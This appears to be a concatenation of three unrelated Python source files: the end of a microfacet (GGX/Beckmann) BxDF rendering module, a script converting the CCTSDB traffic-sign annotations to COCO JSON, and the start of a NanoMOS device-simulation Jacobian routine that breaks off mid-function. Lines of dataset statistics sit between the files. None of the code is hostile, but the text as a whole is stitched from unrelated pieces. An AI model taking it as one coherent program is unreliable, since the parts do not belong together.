# Compute fresnel factor for the appropriate side of the surface.
F = fresnel(eta_i, eta_o, absVdotH)
chooseReflect = F * rGain * boostReflect
chooseRefract = (1.0-F) * Max( tAlbedo )
total = chooseRefract + chooseReflect
chooseReflect = chooseReflect / total
chooseRefract = 1.0 - chooseReflect
roughness2 = roughness*roughness
HdotN = H[...,2]
costheta = ABS( HdotN )
costheta2 = costheta * costheta
if dist == 'G':
# Compute the microfacet distribution (GGX): eq 33
alpha2_tantheta2 = roughness2 + ( 1.0 - costheta2 ) / costheta2
D = chi_plus(HdotN) * roughness2 / np.pi / ( costheta2*costheta2 * alpha2_tantheta2*alpha2_tantheta2 )
# Compute the Smith shadowing terms: eq 34 and eq 23
LdotN2 = LdotN * LdotN
VdotN2 = VdotN * VdotN
iG1o = 1.0 + SQRT( 1.0 + roughness2 * ( 1.0 - LdotN2 ) / LdotN2 )
iG1i = 1.0 + SQRT( 1.0 + roughness2 * ( 1.0 - VdotN2 ) / VdotN2 )
G = chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) * 4.0 / ( iG1o * iG1i )
elif dist == 'B':
# Beckmann distribution and shadowing masking term
# Compute the Beckmann Distribution: eq 25
tantheta2 = ( 1.0 - costheta2 ) / costheta2
D = chi_plus(HdotN)/(np.pi * roughness2 * costheta2 * costheta2) * np.exp(-tantheta2/roughness2);
# Shadowing masking term for Beckmann: eq 27
costhetav = ABS(VdotN)
tanthetav = SQRT(1 - costhetav*costhetav)/costhetav
a = 1.0/(roughness * tanthetav)
iG1i = np.where(a<1.6, BeckmannG1(VdotH/VdotN, a), BeckmannG2(VdotH/VdotN))
costhetal = ABS(LdotN)
tanthetal = SQRT(1 - costhetal*costhetal)/costhetal
a = 1.0/(roughness * tanthetal)
iG1o = np.where(a<1.6, BeckmannG1(LdotH/LdotN, a), BeckmannG2(LdotH/LdotN))
G = iG1i * iG1o
else:
raise ValueError('dist is neither G nor B')
# Final BRDF value and PDF: eq 41
# Refraction case
denom = ( VdotH + (eta_o/eta_i) * LdotH)**2
idenom = 1.0 / denom
fJacobian = absLdotH * idenom
rJacobian = absVdotH * idenom
# refract_value = tAlbedo * ( (1.0-F) * D * G * absVdotH * fJacobian * (eta_o/eta_i)**2 / ABS( VdotN ) )[...,np.newaxis] # baking LdotN
refract_value = tAlbedo * ( (1.0-F) * D * G * absVdotH * fJacobian * (eta_o/eta_i)**2 / (ABS( VdotN ) *ABS( LdotN )))[...,np.newaxis] # not baking LdotN
refract_fpdf = chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) * chooseRefract * D*costheta * fJacobian * (eta_o/eta_i)**2
refract_rpdf = chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) * chooseRefract * D*costheta * rJacobian
# Reflection case
jacobian = 1.0 / ( 4.0 * absLdotH ) # LdotH = VdotH by definition
# reflect_value = makeRtColorRGB( rGain * F * D * G / ( 4.0 * ABS( VdotN ) ) ) # baking LdotN
reflect_value = makeRtColorRGB( rGain * F * D * G / ( 4.0 * ABS( VdotN ) * ABS( LdotN )) ) # no baking LdotN
reflect_fpdf = chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) * chooseReflect * D*costheta * jacobian
reflect_rpdf = chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) * chooseReflect * D*costheta * jacobian
value = np.where(isRefraction[...,np.newaxis], refract_value, reflect_value)
fpdf = np.where(isRefraction, refract_fpdf, reflect_fpdf)
rpdf = np.where(isRefraction, refract_rpdf, reflect_rpdf)
return (value, fpdf, rpdf )
def sample(xi0, xi1, xi2, roughness, eta, wi, dist):
"""Generate a sample from the Walter BxDF by sampling normal distribution."""
""" TODO: Implement sampling according to visible normal"""
rGain = 1.0
boostReflect = 1.0
tAlbedo = np.array((1.0, 1.0, 1.0))
roughness2 = roughness * roughness
(H, costheta) = sampleH(roughness2, xi0, xi1, dist)
VdotH = Dot( wi, H )
absVdotH = ABS( VdotH )
VdotN = wi[...,2]
eta_i = np.where(VdotN > 0, 1.0, eta)
eta_o = np.where(VdotN > 0, eta, 1.0)
F = fresnel(eta_i, eta_o, absVdotH)
chooseReflect = F * rGain * boostReflect;
chooseRefract = (1.0-F) * Max( tAlbedo );
total = chooseRefract + chooseReflect;
chooseReflect = chooseReflect / total;
chooseRefract = 1.0 - chooseReflect;
# choose reflection or refraction
doRefraction = (xi2 >= chooseReflect)
if VdotN[0] > 0:
e = eta
else:
e = 1/eta
wo = np.where(doRefraction[...,np.newaxis],
RefractedVector( wi, H, VdotH, VdotN, e ),
ReflectedVector( wi, H, VdotH )
)
HdotN = H[...,2]
LdotN = wo[...,2]
LdotH = Dot( wo, H )
absLdotH = ABS( LdotH )
if dist == 'G':
# Compute the microfacet distribution (GGX): eq 33
tantheta2 = roughness2 * xi0 / ( 1.0 - xi0 )
costheta2 = 1.0 / ( 1.0 + tantheta2 )
alpha2_tantheta2 = roughness2 + tantheta2
D = chi_plus(HdotN) * roughness2 / np.pi / ( costheta2*costheta2 * alpha2_tantheta2*alpha2_tantheta2 )
# Compute the Smith shadowing terms: eq 34 and eq 23
LdotN = wo[...,2]
LdotN2 = LdotN * LdotN
VdotN2 = VdotN * VdotN
iG1o = 1.0 + SQRT( 1.0 + roughness2 * ( 1.0 - LdotN2 ) / LdotN2 )
iG1i = 1.0 + SQRT( 1.0 + roughness2 * ( 1.0 - VdotN2 ) / VdotN2 )
LdotH = Dot( wo, H )
LdotN = wo[...,2]
G = chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) * 4.0/( iG1o * iG1i )
elif dist == 'B':
# Beckmann distribution and shadowing masking term
# Compute the Beckmann Distribution: eq 25
costh = ABS(HdotN)
costh2 = costh**2
tanth2 = ( 1.0 - costh2 ) / costh2
D = chi_plus(HdotN)/(np.pi * roughness2 * costh2 * costh2) * np.exp(-tanth2/roughness2);
# Shadowing masking term for Beckmann: eq 27
costhetav = ABS(VdotN)
tanthetav = SQRT(1 - costhetav*costhetav)/costhetav
a = 1.0/(roughness * tanthetav)
iG1i = np.where(a<1.6, BeckmannG1(VdotH/VdotN, a), BeckmannG2(VdotH/VdotN))
costhetal = ABS(LdotN)
tanthetal = SQRT(1 - costhetal*costhetal)/costhetal
a = 1.0/(roughness * tanthetal)
iG1o = np.where(a<1.6, BeckmannG1(LdotH/LdotN, a), BeckmannG2(LdotH/LdotN))
G = iG1i * iG1o
else:
raise ValueError('dist is neither G nor B')
# Final BRDF value and PDF: eq 41
# Refraction case
denom = (VdotH + eta_o/eta_i * LdotH)**2
idenom = 1.0 / denom
fJacobian = absLdotH * idenom
rJacobian = absVdotH * idenom
# side check
correct_refract = wi[...,2] * wo[...,2] <0
refract_value = np.where(correct_refract[nax], tAlbedo * ( (1.0-F) * D * G * absVdotH * fJacobian * (eta_o/eta_i)**2 / (ABS( VdotN ) *ABS( LdotN )))[nax], makeRtColorRGB(0.0)) # not baking LdotN
refract_fpdf = np.where(correct_refract, chooseRefract * D * costheta * fJacobian * (eta_o/eta_i)**2, 0)
refract_rpdf = np.where(correct_refract, chooseRefract * D * costheta * rJacobian, 0)
# Reflection case
jacobian = 1.0 / ( 4.0 * absLdotH ) # LdotH = VdotH by definition
# side check
correct_reflect = wi[...,2] * wo[...,2] >0
reflect_value = np.where(correct_reflect[nax], makeRtColorRGB( rGain * F * D * G / ( 4.0 * ABS( VdotN ) * ABS( LdotN )) ), makeRtColorRGB(0.0)) # baking LdotN
reflect_fpdf = np.where(correct_reflect, chooseReflect * D * costheta * jacobian, 0);
reflect_rpdf = np.where(correct_reflect, chooseReflect * D * costheta * jacobian, 0);
value = np.where(doRefraction[nax], refract_value, reflect_value)
fpdf = np.where(doRefraction, refract_fpdf, reflect_fpdf)
rpdf = np.where(doRefraction, refract_rpdf, reflect_rpdf)
return (wo, value, fpdf, rpdf)
def evaluate_reflect(roughness, eta, wo, wi, dist):
# return brdf value (didn't multiply cos), no fresnel term
# retrun pdf, no fresnel term
"""Evaluate BRDF and PDFs for Walter BxDF."""
# eta is assumed > 1, and it is the refractive index of the side of the
# surface facing away from the normal.
# Convention is for forward path tracing; "i" is the viewer and "o" is the light.
VdotN = wi[...,2]
LdotN = wo[...,2]
# Half vector.
H = SIGN(VdotN)[nax] * (wo + wi)
H = Normalize( H )
# check side for H
correct = (H[...,2] * wi[...,2] * wi[...,2]> 0) & (LdotN*VdotN > 0.0)
VdotH = Dot( wi, H )
absVdotH = ABS( VdotH )
LdotH = Dot( wo, H )
absLdotH = ABS( LdotH )
if eta==0:
F=1
else:
eta_i = np.where(VdotN > 0, 1, eta)
eta_o = np.where(VdotN > 0, eta, 1.0)
F = fresnel(eta_i, eta_o, absVdotH)
roughness2 = roughness*roughness
HdotN = H[...,2]
costheta = ABS( HdotN )
costheta2 = costheta * costheta
if dist == 'G':
# Compute the microfacet distribution (GGX): eq 33
alpha2_tantheta2 = roughness2 + ( 1.0 - costheta2 ) / costheta2
D = chi_plus(HdotN) * roughness2 / np.pi / ( costheta2*costheta2 * alpha2_tantheta2*alpha2_tantheta2 )
# Compute the Smith shadowing terms: eq 34 and eq 23
LdotN2 = LdotN * LdotN
VdotN2 = VdotN * VdotN
iG1o = 1.0 + SQRT( 1.0 + roughness2 * ( 1.0 - LdotN2 ) / LdotN2 )
iG1i = 1.0 + SQRT( 1.0 + roughness2 * ( 1.0 - VdotN2 ) / VdotN2 )
G = chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) * 4.0 / ( iG1o * iG1i )
elif dist == 'B':
# Beckmann distribution and shadowing masking term
# Compute the Beckmann Distribution: eq 25
tantheta2 = ( 1.0 - costheta2 ) / costheta2
D = chi_plus(HdotN)/(np.pi * roughness2 * costheta2 * costheta2) * np.exp(-tantheta2/roughness2);
# Shadowing masking term for Beckmann: eq 27
costhetav = ABS(VdotN)
tanthetav = SQRT(1 - costhetav*costhetav)/costhetav
a = 1.0/(roughness * tanthetav)
iG1i = np.where(a<1.6, BeckmannG1(VdotH/VdotN, a), BeckmannG2(VdotH/VdotN))
costhetal = ABS(LdotN)
tanthetal = SQRT(1 - costhetal*costhetal)/costhetal
a = 1.0/(roughness * tanthetal)
iG1o = np.where(a<1.6, BeckmannG1(LdotH/LdotN, a), BeckmannG2(LdotH/LdotN))
G = iG1i * iG1o
else:
raise ValueError('dist is neither G nor B')
# Final BRDF value and PDF: eq 41
# Reflection case
jacobian = 1.0 / ( 4.0 * absLdotH ) # LdotH = VdotH by definition
value = np.where(correct[nax], makeRtColorRGB( F * D * G / ( 4.0 * ABS( VdotN ) * ABS( LdotN )) ), makeRtColorRGB(0.0)) # no baking LdotN
# value = np.where(correct[nax], makeRtColorRGB( F), makeRtColorRGB(0.0)) # no baking LdotN
fpdf = np.where(correct, chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) *D*costheta * jacobian, 0)
rpdf = np.where(correct, chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) *D*costheta * jacobian, 0)
return (value, fpdf, rpdf)
def evaluate_refract(roughness, eta, wo, wi, dist):
# return brdf value (didn't multiply cos), no fresnel term
# retrun pdf, no fresnel term
"""Evaluate BRDF and PDFs for Walter BxDF."""
tAlbedo = np.array((1.0, 1.0, 1.0))
# eta is assumed > 1, and it is the refractive index of the side of the
# surface facing away from the normal.
# Convention is for forward path tracing; "i" is the viewer and "o" is the light.
VdotN = wi[...,2]
LdotN = wo[...,2]
# Refractive indices for the two sides. eta_o is the index for the side
# opposite wi, even when wo is on the same side.
eta_i = np.where(VdotN > 0, 1.0, eta)
eta_o = np.where(VdotN > 0, eta, 1.0)
# Half vector.
H = -(eta_o[nax] * wo + eta_i[nax] * wi)
H = Normalize( H )
# check side
# correct = (H[...,2] * wi[...,2] > 0.0) & (LdotN*VdotN <0.0)
correct = LdotN*VdotN <0.0
VdotH = Dot( wi, H )
absVdotH = ABS( VdotH )
LdotH = Dot( wo, H )
absLdotH = ABS( LdotH )
F = fresnel(eta_i, eta_o, absVdotH)
roughness2 = roughness*roughness
HdotN = H[...,2]
costheta = ABS( HdotN )
costheta2 = costheta * costheta
if dist == 'G':
# Compute the microfacet distribution (GGX): eq 33
alpha2_tantheta2 = roughness2 + ( 1.0 - costheta2 ) / costheta2
D = chi_plus(HdotN) * roughness2 / np.pi / ( costheta2*costheta2 * alpha2_tantheta2*alpha2_tantheta2 )
# Compute the Smith shadowing terms: eq 34 and eq 23
LdotN2 = LdotN * LdotN
VdotN2 = VdotN * VdotN
iG1o = 1.0 + SQRT( 1.0 + roughness2 * ( 1.0 - LdotN2 ) / LdotN2 )
iG1i = 1.0 + SQRT( 1.0 + roughness2 * ( 1.0 - VdotN2 ) / VdotN2 )
G = chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) * 4.0 / ( iG1o * iG1i )
elif dist == 'B':
# Beckmann distribution and shadowing masking term
# Compute the Beckmann Distribution: eq 25
tantheta2 = ( 1.0 - costheta2 ) / costheta2
D = chi_plus(HdotN)/(np.pi * roughness2 * costheta2 * costheta2) * np.exp(-tantheta2/roughness2);
# Shadowing masking term for Beckmann: eq 27
costhetav = ABS(VdotN)
tanthetav = SQRT(1 - costhetav*costhetav)/costhetav
a = 1.0/(roughness * tanthetav)
iG1i = np.where(a<1.6, BeckmannG1(VdotH/VdotN, a), BeckmannG2(VdotH/VdotN))
costhetal = ABS(LdotN)
tanthetal = SQRT(1 - costhetal*costhetal)/costhetal
a = 1.0/(roughness * tanthetal)
iG1o = np.where(a<1.6, BeckmannG1(LdotH/LdotN, a), BeckmannG2(LdotH/LdotN))
G = iG1i * iG1o
else:
raise ValueError('dist is neither G nor B')
# Final BRDF value and PDF: eq 41
# Refraction case
denom = ( VdotH + (eta_o/eta_i) * LdotH)**2
idenom = 1.0 / denom
fJacobian = absLdotH * idenom
rJacobian = absVdotH * idenom
value = np.where(correct[nax], tAlbedo * ( (1-F) * D * G * absVdotH * fJacobian * (eta_o/eta_i)**2 / ( ABS( VdotN) * ABS( LdotN )))[nax], makeRtColorRGB(0.0)) # not baking LdotN
fpdf = np.where(correct, chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) * D*costheta * fJacobian * (eta_o/eta_i)**2, 0)
rpdf = np.where(correct, chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) * D*costheta * rJacobian, 0)
return (value, fpdf, rpdf)
def sample_reflect(xi0, xi1, roughness, eta, wi, dist):
"""Generate a sample from the Walter BxDF by sampling normal distribution."""
""" TODO: Implement sampling according to visible normal"""
roughness2 = roughness * roughness
(H, costheta) = sampleH(roughness2, xi0, xi1, dist)
VdotH = Dot( wi, H )
absVdotH = ABS( VdotH )
VdotN = wi[...,2]
wo = ReflectedVector( wi, H, VdotH )
HdotN = H[...,2]
LdotN = wo[...,2]
LdotH = Dot( wo, H )
absLdotH = ABS( LdotH )
if eta==0:
F=1
else:
eta_i = np.where(VdotN > 0, 1, eta)
eta_o = np.where(VdotN > 0, eta, 1.0)
F = fresnel(eta_i, eta_o, absVdotH)
if dist == 'G':
# Compute the microfacet distribution (GGX): eq 33
tantheta2 = roughness2 * xi0 / ( 1.0 - xi0 )
costheta2 = 1.0 / ( 1.0 + tantheta2 )
alpha2_tantheta2 = roughness2 + tantheta2
D = chi_plus(HdotN) * roughness2 / np.pi / ( costheta2*costheta2 * alpha2_tantheta2*alpha2_tantheta2 )
# Compute the Smith shadowing terms: eq 34 and eq 23
LdotN = wo[...,2]
LdotN2 = LdotN * LdotN
VdotN2 = VdotN * VdotN
iG1o = 1.0 + SQRT( 1.0 + roughness2 * ( 1.0 - LdotN2 ) / LdotN2 )
iG1i = 1.0 + SQRT( 1.0 + roughness2 * ( 1.0 - VdotN2 ) / VdotN2 )
LdotH = Dot( wo, H )
LdotN = wo[...,2]
G = chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) * 4.0/( iG1o * iG1i )
elif dist == 'B':
# Beckmann distribution and shadowing masking term
# Compute the Beckmann Distribution: eq 25
costh = ABS(HdotN)
costh2 = costh**2
tanth2 = ( 1.0 - costh2 ) / costh2
D = chi_plus(HdotN)/(np.pi * roughness2 * costh2 * costh2) * np.exp(-tanth2/roughness2);
# Shadowing masking term for Beckmann: eq 27
costhetav = ABS(VdotN)
tanthetav = SQRT(1 - costhetav*costhetav)/costhetav
a = 1.0/(roughness * tanthetav)
iG1i = np.where(a<1.6, BeckmannG1(VdotH/VdotN, a), BeckmannG2(VdotH/VdotN))
costhetal = ABS(LdotN)
tanthetal = SQRT(1 - costhetal*costhetal)/costhetal
a = 1.0/(roughness * tanthetal)
iG1o = np.where(a<1.6, BeckmannG1(LdotH/LdotN, a), BeckmannG2(LdotH/LdotN))
G = iG1i * iG1o
else:
raise ValueError('dist is neither G nor B')
# Final BRDF value and PDF: eq 41
# Reflection case
jacobian = 1.0 / ( 4.0 * absLdotH ) # LdotH = VdotH by definition
# side check
correct_reflect = wi[...,2] * wo[...,2] >0
value = np.where(correct_reflect[nax], makeRtColorRGB( F * D * G / ( 4.0 * ABS( VdotN ) * ABS( LdotN )) ), makeRtColorRGB(0.0)) # baking LdotN
fpdf = np.where(correct_reflect, D * costheta * jacobian, 0)
rpdf = np.where(correct_reflect, D * costheta * jacobian, 0)
return (wo, value, fpdf, rpdf)
def sample_refract(xi0, xi1, roughness, eta, wi, dist):
"""Generate a sample from the Walter BxDF by sampling normal distribution."""
""" TODO: Implement sampling according to visible normal"""
tAlbedo = np.array((1.0, 1.0, 1.0))
roughness2 = roughness * roughness
(H, costheta) = sampleH(roughness2, xi0, xi1, dist)
VdotH = Dot( wi, H )
absVdotH = ABS( VdotH )
VdotN = wi[...,2]
eta_i = np.where(VdotN > 0, 1.0, eta)
eta_o = np.where(VdotN > 0, eta, 1.0)
if VdotN[0] > 0:
e = eta
else:
e = 1/eta
wo = RefractedVector( wi, H, VdotH, VdotN, e )
HdotN = H[...,2]
LdotN = wo[...,2]
LdotH = Dot( wo, H )
absLdotH = ABS( LdotH )
F = fresnel(eta_i, eta_o, absVdotH)
if dist == 'G':
# Compute the microfacet distribution (GGX): eq 33
tantheta2 = roughness2 * xi0 / ( 1.0 - xi0 )
costheta2 = 1.0 / ( 1.0 + tantheta2 )
alpha2_tantheta2 = roughness2 + tantheta2
D = chi_plus(HdotN) * roughness2 / np.pi / ( costheta2*costheta2 * alpha2_tantheta2*alpha2_tantheta2 )
# Compute the Smith shadowing terms: eq 34 and eq 23
LdotN = wo[...,2]
LdotN2 = LdotN * LdotN
VdotN2 = VdotN * VdotN
iG1o = 1.0 + SQRT( 1.0 + roughness2 * ( 1.0 - LdotN2 ) / LdotN2 )
iG1i = 1.0 + SQRT( 1.0 + roughness2 * ( 1.0 - VdotN2 ) / VdotN2 )
LdotH = Dot( wo, H )
LdotN = wo[...,2]
G = chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) * 4.0/( iG1o * iG1i )
elif dist == 'B':
# Beckmann distribution and shadowing masking term
# Compute the Beckmann Distribution: eq 25
costh = ABS(HdotN)
costh2 = costh**2
tanth2 = ( 1.0 - costh2 ) / costh2
D = chi_plus(HdotN)/(np.pi * roughness2 * costh2 * costh2) * np.exp(-tanth2/roughness2)
# Shadowing masking term for Beckmann: eq 27
costhetav = ABS(VdotN)
tanthetav = SQRT(1 - costhetav*costhetav)/costhetav
a = 1.0/(roughness * tanthetav)
iG1i = np.where(a < 1.6, BeckmannG1(VdotH/VdotN, a), BeckmannG2(VdotH/VdotN))
costhetal = ABS(LdotN)
tanthetal = SQRT(1 - costhetal*costhetal)/costhetal
a = 1.0/(roughness * tanthetal)
iG1o = np.where(a < 1.6, BeckmannG1(LdotH/LdotN, a), BeckmannG2(LdotH/LdotN))
G = iG1i * iG1o
else:
raise ValueError('dist is neither G nor B')
# Final BRDF value and PDF: eq 41
# Refraction case
denom = (VdotH + eta_o/eta_i * LdotH)**2
idenom = 1.0 / denom
fJacobian = absLdotH * idenom
rJacobian = absVdotH * idenom
# side check
correct_refract = wi[...,2] * wo[...,2] <0
value = np.where(correct_refract[nax], tAlbedo * ( (1-F) * D * G * absVdotH * fJacobian * (eta_o/eta_i)**2 / (ABS( VdotN ) *ABS( LdotN )))[nax], makeRtColorRGB(0.0)) # not baking LdotN
fpdf = np.where(correct_refract, D * costheta * fJacobian * (eta_o/eta_i)**2, 0)
rpdf = np.where(correct_refract, D * costheta * rJacobian, 0)
return (wo, value, fpdf, rpdf)
| 36.789799 | 198 | 0.599672 | 3,297 | 23,803 | 4.270852 | 0.074613 | 0.017044 | 0.004261 | 0.016902 | 0.880051 | 0.863007 | 0.841844 | 0.821106 | 0.807329 | 0.78787 | 0 | 0.049035 | 0.266605 | 23,803 | 646 | 199 | 36.846749 | 0.757576 | 0.180103 | 0 | 0.730673 | 0 | 0 | 0.009113 | 0 | 0 | 0 | 0 | 0.001548 | 0 | 1 | 0.062344 | false | 0 | 0.002494 | 0.037406 | 0.114713 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6b58865a1f9873f4cc110a355da33dfd888b824c | 4,855 | py | Python | tools/convert_datasets/txt2coco.py | LiangSiyuan21/Parallel-Rectangle-Flip-Attack-A-Query-based-Black-box-Attack-against-Object-Detection | 3bff39e35053c98eaa4c0b768f1f770f072bd4a2 | [
"Apache-2.0"
] | 13 | 2021-08-28T05:13:18.000Z | 2022-03-26T10:29:54.000Z | tools/convert_datasets/txt2coco.py | SCLBD/Parallel-Rectangle-Flip-Attack-A-Query-based-Black-box-Attack-against-Object-Detection | 3bff39e35053c98eaa4c0b768f1f770f072bd4a2 | [
"Apache-2.0"
] | null | null | null | tools/convert_datasets/txt2coco.py | SCLBD/Parallel-Rectangle-Flip-Attack-A-Query-based-Black-box-Attack-against-Object-Detection | 3bff39e35053c98eaa4c0b768f1f770f072bd4a2 | [
"Apache-2.0"
] | 1 | 2021-09-22T13:49:34.000Z | 2021-09-22T13:49:34.000Z | import json
import os
import cv2
import random
dataset = {'categories':[],'images':[],'annotations':[]}
# 根路径,里面包含images(图片文件夹),annos.txt(bbox标注),classes.txt(类别标签),以及annotations文件夹(如果没有则会自动创建,用于保存最后的json)
root_path = '/srv/hdd/data/CCTSDB_top1000/'
# 用于创建训练集或验证集 可以调成val
phase = 'instances_train2017'
# 训练集和验证集划分的界线 可以调
split =800
class_path=os.path.join(root_path, 'classes.txt')
print(class_path)
# 打开类别标签
with open(class_path) as f:
classes = f.read().strip().split(',')
# 建立类别标签和数字id的对应关系
for i, cls in enumerate(classes, 0):
dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'mark'})
# 读取train2017文件夹的图片名称
# 随机打乱
file_path=os.path.join(root_path, 'images/')
file_list = list(os.listdir(file_path))
random.shuffle(file_list)
_names = [f for f in file_list]
# 判断是建立训练集还是验证集
names_train = [line for i, line in enumerate(_names) if i < split]
names_val = [line for i, line in enumerate(_names) if i >= split]
# if phase == 'instances_train2017':
# names = [line for i, line in enumerate(_names) if i <= split]
# elif phase == 'instances_val2017':
# names = [line for i, line in enumerate(_names) if i > split]
# 读取Bbox信息
with open(os.path.join(root_path, 'annos.txt')) as tr:
annos = tr.readlines()
# 以上数据转换为COCO所需要的train数据集
for k, name in enumerate(names_train,0):
# 用opencv读取图片,得到图像的宽和高
im = cv2.imread(os.path.join(file_path,name))
height, width, _ = im.shape
# 添加图像的信息到dataset中
dataset['images'].append({'file_name': name,
'id': k,
'width': width,
'height': height})
index=name
# 一张图多个框时需要判断
for ii, anno in enumerate(annos,1):
parts = anno.strip().split(';')
# type(parts[0]) string
# 如果图像的名称和标记的名称对上,则添加标记
if parts[0] == index:
# 类别
cls_id = classes.index(parts[5])
# x_min
x1 = float(parts[1])
# y_min
y1 = float(parts[2])
x2 = float(parts[3])
y2 = float(parts[4])
w = x2 - x1
h = y2 - y1
dataset['annotations'].append({
'area': w * h,
'bbox': [x1, y1, w, h],
'category_id': int(cls_id),
'id': ii,
'image_id': k,
'iscrowd': 0,
# mask, 矩形是从左上角点按顺时针的四个顶点
'segmentation': [[x1, y1, x2, y1, x2, y2, x1, y2]]
})
# 保存结果
folder = os.path.join(root_path, 'annotations')
if not os.path.exists(folder):
os.makedirs(folder)
json_name = os.path.join(folder, '{}.json'.format('instances_train2017'))
with open(json_name, 'w') as f:
json.dump(dataset, f)
dataset = {'categories':[],'images':[],'annotations':[]}
# 根路径,里面包含images(图片文件夹),annos.txt(bbox标注),classes.txt(类别标签),以及annotations文件夹(如果没有则会自动创建,用于保存最后的json)
root_path = '/srv/hdd/data/CCTSDB_top1000/'
# 用于创建训练集或验证集 可以调成val
phase = 'instances_val2017'
# 训练集和验证集划分的界线 可以调
split =800
class_path=os.path.join(root_path, 'classes.txt')
print(class_path)
# 打开类别标签
with open(class_path) as f:
classes = f.read().strip().split(',')
# 建立类别标签和数字id的对应关系
for i, cls in enumerate(classes, 0):
dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'mark'})
# 以上数据转换为COCO所需要的val数据集
for k, name in enumerate(names_val,0):
# 用opencv读取图片,得到图像的宽和高
im = cv2.imread(os.path.join(file_path,name))
height, width, _ = im.shape
# 添加图像的信息到dataset中
dataset['images'].append({'file_name': name,
'id': k,
'width': width,
'height': height})
index=name
# 一张图多个框时需要判断
for ii, anno in enumerate(annos,1):
parts = anno.strip().split(';')
# type(parts[0]) string
# 如果图像的名称和标记的名称对上,则添加标记
if parts[0] == index:
# 类别
cls_id = classes.index(parts[5])
# x_min
x1 = float(parts[1])
# y_min
y1 = float(parts[2])
x2 = float(parts[3])
y2 = float(parts[4])
w = x2 - x1
h = y2 - y1
dataset['annotations'].append({
'area': w * h,
'bbox': [x1, y1, w, h],
'category_id': int(cls_id),
'id': ii,
'image_id': k,
'iscrowd': 0,
# mask, 矩形是从左上角点按顺时针的四个顶点
'segmentation': [[x1, y1, x2, y1, x2, y2, x1, y2]]
})
# 保存结果
folder = os.path.join(root_path, 'annotations')
if not os.path.exists(folder):
os.makedirs(folder)
json_name = os.path.join(folder, '{}.json'.format('instances_val2017'))
with open(json_name, 'w') as f:
json.dump(dataset, f)
print('done') | 30.923567 | 100 | 0.560247 | 586 | 4,855 | 4.542662 | 0.21843 | 0.027047 | 0.037566 | 0.031555 | 0.864763 | 0.858002 | 0.831705 | 0.831705 | 0.831705 | 0.831705 | 0 | 0.029977 | 0.292276 | 4,855 | 157 | 101 | 30.923567 | 0.744761 | 0.183728 | 0 | 0.808081 | 0 | 0 | 0.129493 | 0.014785 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.040404 | 0 | 0.040404 | 0.030303 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6b59bd3bccbedee6088c4f33e31d50f443df31ba | 6,491 | py | Python | fprime.py | karnatyrohit/nanomos2.5_python | b072473d720c331226d472218c623f958a1f9f86 | [
"MIT"
] | null | null | null | fprime.py | karnatyrohit/nanomos2.5_python | b072473d720c331226d472218c623f958a1f9f86 | [
"MIT"
] | null | null | null | fprime.py | karnatyrohit/nanomos2.5_python | b072473d720c331226d472218c623f958a1f9f86 | [
"MIT"
] | null | null | null | ###########################################################################
####################A function to evaluate F_prime once####################
#########################September 2001 - Purdue###########################
###########################################################################
from readinput import *
def fprime(Nx, Ny, Ntotal, F_prime):
transport_model = transportmodel.value
fermi_flag = fermiflag1.value
Lsda = round(Lsd/dx)
Lg_topa = round(Lg_top/dx)
Lg_bota = round(Lg_bot/dx)
t_topa = round(t_top/dy)
t_bota = round(t_bot/dy)
t_sia = round(t_si/dy)
###########################################################################
####################Top gate insulator region##############################
###########################################################################
for i_node in np.arange(0, (Nx*(t_topa+1))):
if i_node >= 0 and i_node <= Lsda-1:
F_prime[i_node, i_node] = 1
F_prime[i_node, i_node+Nx] = -1
elif (i_node >= Lsda and i_node <= ((Lsda+Lg_topa))):
F_prime[i_node, i_node] = 1
elif (i_node >= ((Lsda+Lg_topa)+1) and i_node <= Nx-1):
F_prime[i_node, i_node] = 1
F_prime[i_node, i_node+Nx] = -1
elif(i_node >= (Nx*t_topa) and i_node <= (Nx*(t_topa+1) - 1)):
F_prime[i_node, i_node-Nx-1] = -eps_top/eps_si*dy/dx/8.0
F_prime[i_node, i_node-Nx] = -eps_top/eps_si*(dx/dy-dy/dx/4)
F_prime[i_node, i_node-Nx+1] = -eps_top/eps_si*dy/dx/8.0
F_prime[i_node, i_node-1] = -(eps_top/eps_si+1)*dy/dx*3.0/8.0
F_prime[i_node, i_node] = (eps_top/eps_si+1)*(dy/dx*3.0/4.0+dx/dy)
F_prime[i_node, i_node+1] = -(eps_top/eps_si+1)*dy/dx*3.0/8.0
F_prime[i_node, i_node+Nx-1] = -dy/dx/8.0
F_prime[i_node, i_node+Nx] = -(dx/dy-dy/dx/4.0)
F_prime[i_node, i_node+Nx+1] = -dy/dx/8.0
else:
F_prime[i_node, i_node-Nx] = -eps_top/eps_si*dx/dy
F_prime[i_node, i_node-1] = -eps_top/eps_si*dy/dx
F_prime[i_node, i_node] = 2.0*(dy/dx+dx/dy)*eps_top/eps_si
F_prime[i_node, i_node+1] = -eps_top/eps_si*dy/dx
F_prime[i_node, i_node+Nx] = -eps_top/eps_si*dx/dy
# Bottom gate insulator region
###########################
